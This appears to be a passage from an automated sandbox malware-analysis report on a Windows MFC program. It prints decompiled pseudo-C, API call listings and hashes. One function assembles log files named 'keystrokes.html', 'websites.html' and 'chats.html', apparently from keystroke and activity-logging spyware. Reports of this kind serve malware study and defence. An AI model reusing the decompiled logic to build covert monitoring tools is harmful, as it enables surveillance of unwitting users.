    • #800.MFC42(?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8BA
    • #825.MFC42(00000000,?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8C0
    • DeleteFileA.KERNEL32(?,?,00000000,00000800,?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8C7
    • MoveFileA.KERNEL32 ref: 0042A8D1
    • #800.MFC42(?,?,0000B021,00000000,?,00000000,.tmp,?,?,00008000,00000000), ref: 0042A8E0
    • #665.MFC42(?,00008000,00000000), ref: 0042A8ED
    • #665.MFC42(?,00008000,00000000), ref: 0042A8F9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#1979#354#5186#665File$#3180#3318#537#5442#6385#823#825#924DeleteH_prologMove
    • String ID: .tmp
    • API String ID: 305873378-2986845003
    • Opcode ID: 87ba66c8bba4c17929835ed87ef95f6cae4899f468e9b137d3c1cf1e9a6ea6c3
    • Instruction ID: bfe8f811415cd10edc97a19dd742a66821ef03b2ee5b5deb08405478e6b60b2e
    • Opcode Fuzzy Hash: 87ba66c8bba4c17929835ed87ef95f6cae4899f468e9b137d3c1cf1e9a6ea6c3
    • Instruction Fuzzy Hash: 7041B431D00169AADF14FBB6EC55AEE7B78AF19348F10406EF802A3192DF3C4A05C769
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E0041928F(intOrPtr __ecx) {
    				int _t71;
    				char _t72;
    				void* _t79;
    				struct HMENU__* _t80;
    				struct HMENU__* _t81;
    				int* _t82;
    				long _t85;
    				intOrPtr* _t88;
    				int _t98;
    				signed int _t102;
    				int _t117;
    				intOrPtr* _t134;
    				struct HMENU__* _t139;
    				int* _t140;
    				intOrPtr _t141;
    				void* _t142;
    
    				_t71 = E0043E4E0(0x44109c, _t142);
    				_push(0x4e25);
    				 *((intOrPtr*)(_t142 - 0x24)) = __ecx;
    				 *(_t142 - 0x20) = 0;
    				L0043DFA6();
    				if(_t71 != 0) {
    					_t72 =  *0x4550cc; // 0x0
    					 *(_t142 - 0xbc) = _t72;
    					_t102 = 0x1f;
    					 *(_t142 - 0x28) = 0x80;
    					memset(_t142 - 0xbb, 0, _t102 << 2);
    					asm("stosw");
    					asm("stosb");
    					GetUserNameA(_t142 - 0xbc, _t142 - 0x28);
    					if( *(_t142 - 0xbc) == 0) {
    						lstrcpyA(_t142 - 0xbc,  *(E00429029(_t142 - 0x18, 0xe072)));
    						L0043DD36();
    					}
    					_t79 = E00429029(_t142 - 0x18, 0xe073);
    					 *(_t142 - 4) = 0;
    					_push(_t142 - 0xbc);
    					_push(_t79);
    					_t80 = _t142 - 0x1c;
    					_push(_t80);
    					L0043DE20();
    					 *(_t142 - 4) = 2;
    					L0043DD36();
    					_push(0x50);
    					L0043DD54();
    					 *(_t142 - 0x14) = _t80;
    					 *(_t142 - 4) = 3;
    					if(_t80 == 0) {
    						_t134 = 0;
    					} else {
    						_t134 = L00407A6F(_t80, _t80);
    					}
    					 *(_t142 - 4) = 2;
    					 *((intOrPtr*)(_t134 + 0x4c)) = 2;
    					_t81 = CreatePopupMenu();
    					_push(_t81);
    					L0043E2D6();
    					_push(0x1c);
    					 *((intOrPtr*)(_t134 + 0x10)) = 0xefefef;
    					 *((intOrPtr*)(_t134 + 0x14)) = 0xffffff;
    					 *((intOrPtr*)(_t134 + 0x18)) = 0;
    					 *((intOrPtr*)(_t134 + 0x1c)) = 0x5a5a5a;
    					L0043DD54();
    					_t139 = _t81;
    					 *(_t142 - 0x14) = _t139;
    					 *(_t142 - 4) = 4;
    					if(_t139 == 0) {
    						_t139 = 0;
    					} else {
    						_t29 = _t142 - 0x1c; // 0x5a5a5a
    						 *((intOrPtr*)(_t142 - 0x10)) =  *_t29;
    						_t81 = L00408EBB( *_t29, _t139);
    						_t31 = _t142 - 0x10; // 0xefefef
    						_push( *_t31);
    						 *(_t142 - 4) = 5;
    						_t139->i = 0x447aa8;
    						 *(_t139 + 8) = 1;
    						L0043DDD2();
    						 *(_t139 + 0x14) =  *(_t139 + 0x14) & 0x00000000;
    					}
    					_push(0);
    					_push(_t139);
    					 *(_t142 - 4) = 2;
    					_t82 = L00408DA4(_t81, _t134, 0);
    					_push(0x1c);
    					L0043DD54();
    					_t140 = _t82;
    					 *(_t142 - 0x2c) = _t140;
    					 *(_t142 - 4) = 6;
    					if(_t140 == 0) {
    						_t140 = 0;
    						_t98 = 2;
    					} else {
    						 *(_t142 - 0x20) = 1;
    						_t88 = E00429029(_t142 - 0x14, 0xe074);
    						 *(_t142 - 4) = 7;
    						 *((intOrPtr*)(_t142 - 0x10)) =  *_t88;
    						_t82 = L00408EBB( *_t88, _t140);
    						 *_t140 = 0x447aa8;
    						_t98 = 2;
    						_t45 = _t142 - 0x10; // 0xefefef
    						_push( *_t45);
    						 *(_t142 - 4) = 8;
    						_t140[2] = _t98;
    						L0043DDD2();
    						_t140[5] = _t140[5] & 0x00000000;
    					}
    					_push(0);
    					_push(_t140);
    					 *(_t142 - 4) = 9;
    					L00408DA4(_t82, _t134, 0);
    					 *(_t142 - 4) = _t98;
    					if(( *(_t142 - 0x20) & 0x00000001) != 0) {
    						L0043DD36();
    					}
    					_t141 =  *((intOrPtr*)(_t142 - 0x24));
    					_t85 = CheckMenuItem( *(_t134 + 4),  *(_t141 + 0x1c0), 8);
    					_push(0x4e25);
    					L0043E066();
    					_t71 = GetWindowRect( *(_t85 + 0x20), _t142 - 0x3c);
    					_push(0);
    					_push(_t141);
    					_push( *((intOrPtr*)(_t142 - 0x30)));
    					_push( *(_t142 - 0x3c));
    					_push(0x102);
    					L0043E2D0();
    					_t117 = 1;
    					if(_t71 != _t117) {
    						if(_t71 == _t98) {
    							 *(_t141 + 0x1c0) = _t98;
    						}
    					} else {
    						 *(_t141 + 0x1c0) = _t117;
    					}
    					if(_t134 != 0) {
    						_t71 =  *((intOrPtr*)( *_t134 + 4))(_t117);
    					}
    					 *(_t142 - 4) =  *(_t142 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t142 - 0xc));
    				return _t71;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00419294
    • #4055.MFC42(00004E25), ref: 004192AD
    • GetUserNameA.ADVAPI32(?,00000080), ref: 004192E8
    • lstrcpyA.KERNEL32(00000000,00000000), ref: 00419310
    • #800.MFC42 ref: 00419319
    • #924.MFC42(?,00000000,00000000), ref: 0041933D
    • #800.MFC42(?,00000000,00000000), ref: 00419349
    • #823.MFC42(00000050,?,00000000,00000000), ref: 00419350
    • CreatePopupMenu.USER32(?,?,00000000,00000000), ref: 0041937A
    • #1644.MFC42(00000000,?,?,00000000,00000000), ref: 00419383
    • #823.MFC42(0000001C,00000000,?,?,00000000,00000000), ref: 004193A2
    • #860.MFC42(,?,?,00000000,00000000), ref: 004193DA
    • #823.MFC42(0000001C,?,?,00000000,00000000), ref: 004193F9
    • #860.MFC42(,?,?,00000000,00000000), ref: 00419448
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #800.MFC42(?,?,00000000,00000000), ref: 00419477
    • CheckMenuItem.USER32(?,?,00000008), ref: 0041948B
    • #3092.MFC42(00004E25,?,?,00000000,00000000), ref: 00419498
    • GetWindowRect.USER32 ref: 004194A4
    • #6270.MFC42(00000102,?,?,?,00000000,?,?,00000000,00000000), ref: 004194BA
    • #800.MFC42(?,?,?,00000000,?,?,00000000,00000000), ref: 004194EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#823$#860Menu$#1168#1644#3092#4055#537#6270#924CheckCreateH_prologItemLoadNamePopupRectStringUserWindowlstrcpy
    • String ID: ZZZ$ZZZ$
    • API String ID: 1344333890-3423331757
    • Opcode ID: 4288fd3069aa800c77226ea70a20bfa23afa6eefb7a52f55914676f7e271052f
    • Instruction ID: 0a9211ace98afe87d242dc7c9eb282712b41aaf0f36b400b24ae6c5c17b1cf5b
    • Opcode Fuzzy Hash: 4288fd3069aa800c77226ea70a20bfa23afa6eefb7a52f55914676f7e271052f
    • Instruction Fuzzy Hash: 6E71DF71D04259EEEB24DFA5D84ABEEBBB5BF08304F10055EE101A72C1DBB85A44CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E00427C70(void* __ecx, void* __edx) {
    				void* _t60;
    				void* _t78;
    				intOrPtr _t83;
    				void* _t85;
    				void* _t87;
    				void* _t88;
    
    				_t76 = __edx;
    				E0043E4E0(0x442e50, _t85);
    				_t88 = _t87 - 0x1c;
    				_push("bpk.dat");
    				_push(0x4558c4);
    				_t78 = __ecx;
    				_push(_t85 - 0x28);
    				 *((intOrPtr*)(_t85 - 0x10)) = 0;
    				L0043DE20();
    				_push("web.dat");
    				_push(0x4558c4);
    				_push(_t85 - 0x24);
    				 *(_t85 - 4) = 0;
    				L0043DE20();
    				_push("bpkch.dat");
    				_push(0x4558c4);
    				_push(_t85 - 0x20);
    				 *(_t85 - 4) = 1;
    				L0043DE20();
    				_push("keystrokes.html");
    				_push(0x4558c8);
    				_push(_t85 - 0x1c);
    				 *(_t85 - 4) = 2;
    				L0043DE20();
    				_push("websites.html");
    				_push(0x4558c8);
    				_push(_t85 - 0x18);
    				 *(_t85 - 4) = 3;
    				L0043DE20();
    				_push("chats.html");
    				_push(0x4558c8);
    				_push(_t85 - 0x14);
    				 *(_t85 - 4) = 4;
    				L0043DE20();
    				 *(_t85 - 4) = 5;
    				if( *((intOrPtr*)(__ecx + 0x17f8)) == 0) {
    					L3:
    					_t83 = 1;
    					L4:
    					if( *((intOrPtr*)(_t78 + 0x17f8)) != 0) {
    						_push(_t83);
    						_push( *((intOrPtr*)(_t85 - 0x18)));
    						_push( *((intOrPtr*)(_t85 - 0x24)));
    						if(E0042A486(_t76) != 0) {
    							_push(_t85 - 0x18);
    							L0043DFCA();
    							 *((intOrPtr*)(_t85 - 0x10)) = _t83;
    						}
    						if( *((intOrPtr*)(_t78 + 0x17f8)) != 0) {
    							_push(2);
    							_push( *((intOrPtr*)(_t85 - 0x14)));
    							_push( *((intOrPtr*)(_t85 - 0x20)));
    							if(E0042A486(_t76) != 0) {
    								_push(_t85 - 0x14);
    								L0043DFCA();
    								 *((intOrPtr*)(_t85 - 0x10)) = _t83;
    							}
    						}
    					}
    					 *(_t85 - 4) = 4;
    					L0043DD36();
    					 *(_t85 - 4) = 3;
    					L0043DD36();
    					 *(_t85 - 4) = 2;
    					L0043DD36();
    					 *(_t85 - 4) = 1;
    					L0043DD36();
    					 *(_t85 - 4) = 0;
    					L0043DD36();
    					 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
    					L0043DD36();
    					 *[fs:0x0] =  *((intOrPtr*)(_t85 - 0xc));
    					return  *((intOrPtr*)(_t85 - 0x10));
    				}
    				_push(0);
    				_push( *((intOrPtr*)(_t85 - 0x1c)));
    				_push( *((intOrPtr*)(_t85 - 0x28)));
    				_t60 = E0042A486(__edx);
    				_t88 = _t88 + 0xc;
    				if(_t60 == 0) {
    					goto L3;
    				} else {
    					_push(_t85 - 0x1c);
    					L0043DFCA();
    					_t83 = 1;
    					 *((intOrPtr*)(_t85 - 0x10)) = 0x4558c8;
    					goto L4;
    				}
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00427C75
    • #924.MFC42(?,004558C4,bpk.dat,?,?,00000000), ref: 00427C96
    • #924.MFC42(?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CA8
    • #924.MFC42(?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CBB
    • #924.MFC42(?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat,?,?,00000000), ref: 00427CD3
    • #924.MFC42(?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?,004558C4,bpk.dat), ref: 00427CE6
    • #924.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427CF9
    • #858.MFC42(?,?,?,00000000), ref: 00427D24
    • #858.MFC42(?,?,?,00000000), ref: 00427D56
    • #858.MFC42(?,?,?,?,?,?,00000000), ref: 00427D81
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427D90
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427D9C
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DA8
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DB4
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DBF
    • #800.MFC42(?,004558C8,chats.html,?,004558C8,websites.html,?,004558C8,keystrokes.html,?,004558C4,bpkch.dat,?,004558C4,web.dat,?), ref: 00427DCB
      • Part of subcall function 0042A486: __EH_prolog.LIBCMT ref: 0042A48B
      • Part of subcall function 0042A486: CoInitialize.OLE32(00000000), ref: 0042A497
      • Part of subcall function 0042A486: CoUninitialize.OLE32(?,?,00000000), ref: 0042A4A6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800#924$#858$H_prolog$InitializeUninitialize
    • String ID: P.D$bpk.dat$bpkch.dat$chats.html$keystrokes.html$web.dat$websites.html
    • API String ID: 1845883038-3825156867
    • Opcode ID: bfc51e78563170725a8be9a30a06eed13b4b40a3063c931c9a8cb600e42f7baf
    • Instruction ID: b3ed319e97b9e827fc72946500639c61b5c89e55fca48b337b27c2bfc678031f
    • Opcode Fuzzy Hash: bfc51e78563170725a8be9a30a06eed13b4b40a3063c931c9a8cb600e42f7baf
    • Instruction Fuzzy Hash: 6C419E71D0025AAADB01EBE5DD46BEEFFB8AF19304F54006EE41473282D77C5A09C76A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0040C524(void* __ecx) {
    				intOrPtr _t17;
    				void* _t19;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				void* _t24;
    				void* _t33;
    				void* _t35;
    				void* _t41;
    
    				_t17 = E0043E4E0(0x43fda0, _t35);
    				_push(__ecx);
    				_t33 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x24)) != 0xffffffff) {
    					MessageBeep(0);
    					_push("Unknown error!");
    					L0043DE26();
    					_t17 =  *((intOrPtr*)(_t33 + 0x24));
    					 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
    					_t41 = _t17 - 0xb;
    					if(_t41 > 0) {
    						_t19 = _t17 - 0x1a;
    						if(_t19 == 0) {
    							_push("A sharing violation occurred.");
    							goto L32;
    						} else {
    							_t20 = _t19 - 1;
    							if(_t20 == 0) {
    								_push("The filename association is\nincomplete or invalid.");
    								goto L32;
    							} else {
    								_t21 = _t20 - 1;
    								if(_t21 == 0) {
    									_push("The DDE transaction could not\nbe completed because the request timed out.");
    									goto L32;
    								} else {
    									_t22 = _t21 - 1;
    									if(_t22 == 0) {
    										_push("The DDE transaction failed.");
    										goto L32;
    									} else {
    										_t23 = _t22 - 1;
    										if(_t23 == 0) {
    											_push("The DDE transaction could not\nbe completed because other DDE transactions\nwere being processed.");
    											goto L32;
    										} else {
    											_t24 = _t23 - 1;
    											if(_t24 == 0) {
    												_push("There is no application associated\nwith the given filename extension.");
    												goto L32;
    											} else {
    												_t17 = _t24 - 1;
    												if(_t17 == 0) {
    													_push("The specified dynamic-link library was not found.");
    													goto L32;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						if(_t41 == 0) {
    							_push("The .EXE file is invalid\n(non-Win32 .EXE or error in .EXE image).");
    							goto L32;
    						} else {
    							if(_t17 == 0xfffffffd) {
    								_push( *((intOrPtr*)(0x4552fc +  *(_t33 + 8) * 4)));
    								_t17 = _t35 - 0x10;
    								_push("%s action failed!");
    								_push(_t17);
    								L0043E174();
    							} else {
    								if(_t17 == 0xfffffffe) {
    									_push("Failed to execute unknown action!");
    									goto L32;
    								} else {
    									if(_t17 == 0) {
    										_push("The operating system is out\nof memory or resources.");
    										goto L32;
    									} else {
    										if(_t17 == 2) {
    											_push("The specified file was not found.");
    											goto L32;
    										} else {
    											if(_t17 == 3) {
    												_push("The specified path was not found.");
    												goto L32;
    											} else {
    												if(_t17 == 5) {
    													_push("The operating system denied\naccess to the specified file.");
    													goto L32;
    												} else {
    													if(_t17 == 8) {
    														_push("There was not enough memory to complete the operation.");
    														L32:
    														_t17 = _t35 - 0x10;
    														_push(_t17);
    														L0043E174();
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					_push(0);
    					_push(0x10);
    					_push( *((intOrPtr*)(_t35 - 0x10)));
    					L0043E16E();
    					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
    				return _t17;
    			}

    0x0040c529
    0x0040c52e
    0x0040c530
    0x0040c536
    0x0040c53e
    0x0040c544
    0x0040c54c
    0x0040c551
    0x0040c554
    0x0040c558
    0x0040c55b
    0x0040c5d9
    0x0040c5dc
    0x0040c61a
    0x00000000
    0x0040c5de
    0x0040c5de
    0x0040c5df
    0x0040c613
    0x00000000
    0x0040c5e1
    0x0040c5e1
    0x0040c5e2
    0x0040c60c
    0x00000000
    0x0040c5e4
    0x0040c5e4
    0x0040c5e5
    0x0040c605
    0x00000000
    0x0040c5e7
    0x0040c5e7
    0x0040c5e8
    0x0040c5fe
    0x00000000
    0x0040c5ea
    0x0040c5ea
    0x0040c5eb
    0x0040c5f7
    0x00000000
    0x0040c5ed
    0x0040c5ed
    0x0040c5ee
    0x0040c5f0
    0x00000000
    0x0040c5f0
    0x0040c5ee
    0x0040c5eb
    0x0040c5e8
    0x0040c5e5
    0x0040c5e2
    0x0040c5df
    0x0040c55d
    0x0040c55d
    0x0040c5d2
    0x00000000
    0x0040c55f
    0x0040c562
    0x0040c5b8
    0x0040c5bf
    0x0040c5c2
    0x0040c5c7
    0x0040c5c8
    0x0040c564
    0x0040c567
    0x0040c5ae
    0x00000000
    0x0040c569
    0x0040c56b
    0x0040c5a7
    0x00000000
    0x0040c56d
    0x0040c570
    0x0040c5a0
    0x00000000
    0x0040c572
    0x0040c575
    0x0040c599
    0x00000000
    0x0040c577
    0x0040c57a
    0x0040c58f
    0x00000000
    0x0040c57c
    0x0040c57f
    0x0040c585
    0x0040c61f
    0x0040c61f
    0x0040c622
    0x0040c623
    0x0040c629
    0x0040c57f
    0x0040c57a
    0x0040c575
    0x0040c570
    0x0040c56b
    0x0040c567
    0x0040c562
    0x0040c55d
    0x0040c62a
    0x0040c62c
    0x0040c62e
    0x0040c631
    0x0040c636
    0x0040c63d
    0x0040c63d
    0x0040c646
    0x0040c64e

    APIs
    • __EH_prolog.LIBCMT ref: 0040C529
    • MessageBeep.USER32(00000000), ref: 0040C53E
    • #537.MFC42(Unknown error!), ref: 0040C54C
    • #2818.MFC42(?,%s action failed!,Unknown error!), ref: 0040C5C8
    • #2818.MFC42(?,A sharing violation occurred.,Unknown error!), ref: 0040C623
    • #1200.MFC42(?,00000010,00000000,Unknown error!), ref: 0040C631
    • #800.MFC42(?,00000010,00000000,Unknown error!), ref: 0040C63D
    Strings
    • The operating system deniedaccess to the specified file., xrefs: 0040C58F
    • A sharing violation occurred., xrefs: 0040C61A
    • Failed to execute unknown action!, xrefs: 0040C5AE
    • The .EXE file is invalid(non-Win32 .EXE or error in .EXE image)., xrefs: 0040C5D2
    • The filename association isincomplete or invalid., xrefs: 0040C613
    • Unknown error!, xrefs: 0040C544
    • The DDE transaction failed., xrefs: 0040C605
    • The operating system is outof memory or resources., xrefs: 0040C5A7
    • %s action failed!, xrefs: 0040C5C2
    • There is no application associatedwith the given filename extension., xrefs: 0040C5F7
    • There was not enough memory to complete the operation., xrefs: 0040C585
    • The DDE transaction could notbe completed because other DDE transactionswere being processed., xrefs: 0040C5FE
    • The specified file was not found., xrefs: 0040C5A0
    • The specified dynamic-link library was not found., xrefs: 0040C5F0
    • The specified path was not found., xrefs: 0040C599
    • The DDE transaction could notbe completed because the request timed out., xrefs: 0040C60C
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2818$#1200#537#800BeepH_prologMessage
    • String ID: %s action failed!$A sharing violation occurred.$Failed to execute unknown action!$The .EXE file is invalid(non-Win32 .EXE or error in .EXE image).$The DDE transaction could notbe completed because other DDE transactionswere being processed.$The DDE transaction could notbe completed because the request timed out.$The DDE transaction failed.$The filename association isincomplete or invalid.$The operating system deniedaccess to the specified file.$The operating system is outof memory or resources.$The specified dynamic-link library was not found.$The specified file was not found.$The specified path was not found.$There is no application associatedwith the given filename extension.$There was not enough memory to complete the operation.$Unknown error!
    • API String ID: 3185299381-1074963315
    • Opcode ID: e32150de63c7717e32e6dd744d38a45304f1aa8703e5668f0a5b833e1b4ac76c
    • Instruction ID: 7097643f913a1da9438510457e980e1fd2dab88589d1732124d77c2ac86f96b5
    • Opcode Fuzzy Hash: e32150de63c7717e32e6dd744d38a45304f1aa8703e5668f0a5b833e1b4ac76c
    • Instruction Fuzzy Hash: 1B21C470544615F2CA348B944CCBB7A7210A7447D3F382F37B913B12D395BDAA06A10F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E0040E42B(struct HFONT__* __ecx) {
    				struct HBITMAP__* _t124;
    				struct HBITMAP__* _t131;
    				unsigned int _t132;
    				signed int _t137;
    				signed int _t139;
    				struct HFONT__* _t144;
    				intOrPtr _t148;
    				intOrPtr _t152;
    				signed int _t156;
    				struct HFONT__* _t170;
    				intOrPtr _t172;
    				signed int _t185;
    				signed int _t207;
    				int _t221;
    				int _t223;
    				signed int _t228;
    				int _t231;
    				signed int _t232;
    				signed int _t234;
    				void* _t235;
    				struct HFONT__* _t238;
    				signed int _t243;
    				void* _t244;
    				void* _t246;
    				void* _t247;
    				void* _t249;
    
    				_t124 = E0043E4E0(0x44012b, _t244);
    				_t247 = _t246 - 0x7c;
    				_t170 = __ecx;
    				 *(_t244 - 0x2c) = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x68)) == 0) {
    					GetClientRect( *(__ecx + 0x20), _t244 - 0x54);
    					_t231 =  *((intOrPtr*)(_t244 - 0x48)) -  *((intOrPtr*)(_t244 - 0x50));
    					_t221 =  *(_t244 - 0x4c) -  *(_t244 - 0x54);
    					_push(_t170);
    					 *(_t244 - 0x1c) = _t231;
    					L0043E10E();
    					 *(_t244 - 4) =  *(_t244 - 4) & 0x00000000;
    					L0043E000();
    					 *(_t244 - 4) = 1;
    					asm("sbb eax, eax");
    					_push(CreateCompatibleDC( ~(_t244 - 0x88) &  *(_t244 - 0x84)));
    					L0043DFFA();
    					_t172 = _t170 + 0x64;
    					L0043DD72();
    					_t131 = CreateCompatibleBitmap( *(_t244 - 0x84), _t221, _t231);
    					_push(_t131);
    					L0043DD60();
    					if(_t172 != 0) {
    						_t172 =  *((intOrPtr*)(_t172 + 4));
    					}
    					_push(_t172);
    					_push( *((intOrPtr*)(_t244 - 0x40)));
    					L0043DD84();
    					 *(_t244 - 0x34) = _t131;
    					_t132 = GetSysColor(0xf);
    					 *(_t244 - 0x28) = _t132 & 0x000000ff;
    					 *(_t244 - 0x18) = _t132;
    					 *(_t244 - 0x24) = _t132 & 0x000000ff;
    					_t185 =  *(_t244 - 0x4c);
    					 *(_t244 - 0x20) = _t132 >> 0x00000010 & 0x000000ff;
    					asm("cdq");
    					_t232 = 8;
    					_t137 = (_t185 << 3) / _t232;
    					 *(_t244 - 0x10) = _t137;
    					asm("cdq");
    					_t139 = _t221 / 0x80;
    					_t234 = _t137 -  *(_t244 - 0x54);
    					_t207 = 1;
    					 *(_t244 - 0x14) = _t139;
    					if(_t139 <= _t207) {
    						 *(_t244 - 0x14) = _t207;
    					}
    					_push( *(_t244 - 0x18));
    					_t223 = 0;
    					_push( *(_t244 - 0x1c));
    					_push(_t185 -  *(_t244 - 0x10));
    					_push(0);
    					_push( *(_t244 - 0x10));
    					_push(_t244 - 0x44);
    					E0040E6E1(_t185 -  *(_t244 - 0x10));
    					_t187 =  *(_t244 - 0x10);
    					_t249 = _t247 + 0x18;
    					if(_t187 >  *(_t244 - 0x14)) {
    						_t228 = _t234 * _t234;
    						_t156 =  ~( *(_t244 - 0x14));
    						 *(_t244 - 0x30) = _t156;
    						 *(_t244 - 0x18) = _t234 - _t187;
    						while(1) {
    							 *(_t244 - 0x18) =  *(_t244 - 0x18) - _t156;
    							 *(_t244 - 0x10) =  *(_t244 - 0x10) -  *(_t244 - 0x14);
    							asm("cdq");
    							asm("cdq");
    							_t243 =  *(_t244 - 0x10);
    							asm("cdq");
    							_t187 = 0 << 0x00000008 |  *(_t244 - 0x28) -  *(_t244 - 0x18) *  *(_t244 - 0x18) *  *(_t244 - 0x28) / _t228 & 0x000000ff;
    							_push(0 << 8);
    							_push( *(_t244 - 0x1c));
    							_push( *(_t244 - 0x14));
    							_push(0);
    							_push(_t243);
    							_push(_t244 - 0x44);
    							E0040E6E1(0 << 0x00000008 |  *(_t244 - 0x28) -  *(_t244 - 0x18) *  *(_t244 - 0x18) *  *(_t244 - 0x28) / _t228 & 0x000000ff);
    							_t249 = _t249 + 0x18;
    							if(_t243 <=  *(_t244 - 0x14)) {
    								break;
    							}
    							_t156 =  *(_t244 - 0x30);
    						}
    						_t223 = 0;
    					}
    					_push(_t223);
    					_push( *(_t244 - 0x1c));
    					_push( *(_t244 - 0x10));
    					_push(_t223);
    					_push(_t223);
    					_push(_t244 - 0x44);
    					E0040E6E1(_t187);
    					_t144 =  *(_t244 - 0x2c);
    					_t235 = _t144 + 0x5c;
    					if(_t235 == _t223 ||  *((intOrPtr*)(_t235 + 4)) == _t223) {
    						_t144 = CreateFontA(0x12, _t223, _t223, _t223, 0x2bc, _t223, _t223, _t223, _t223, _t223, _t223, _t223, 0x30,  *(_t144 + 0x40));
    						_push(_t144);
    						L0043DD60();
    					}
    					L0043E108();
    					 *(_t244 - 0x4c) =  *(_t244 - 0x4c) - 5;
    					 *(_t244 - 0x30) = _t144;
    					L0043E024();
    					L0043E246();
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					OffsetRect(_t244 - 0x64, 1, 1);
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					asm("movsd");
    					_t238 =  *(_t244 - 0x2c);
    					_t148 =  *((intOrPtr*)(_t238 + 0x6c));
    					 *((intOrPtr*)( *((intOrPtr*)(_t244 - 0x44)) + 0x70))(_t148,  *((intOrPtr*)(_t148 - 8)), _t244 - 0x74, 0x26, GetSysColor(0x14), 1, _t235);
    					L0043E246();
    					_t152 =  *((intOrPtr*)(_t238 + 0x6c));
